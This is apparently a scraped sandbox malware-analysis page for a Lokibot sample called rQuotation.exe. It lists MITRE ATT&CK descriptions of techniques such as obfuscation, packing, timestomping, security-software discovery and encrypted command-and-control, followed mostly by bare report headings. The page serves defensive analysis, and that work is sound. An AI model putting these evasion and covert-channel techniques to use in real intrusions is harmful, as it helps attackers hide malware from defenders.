Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rQuotation.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rQuotation.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
rQuotation.exe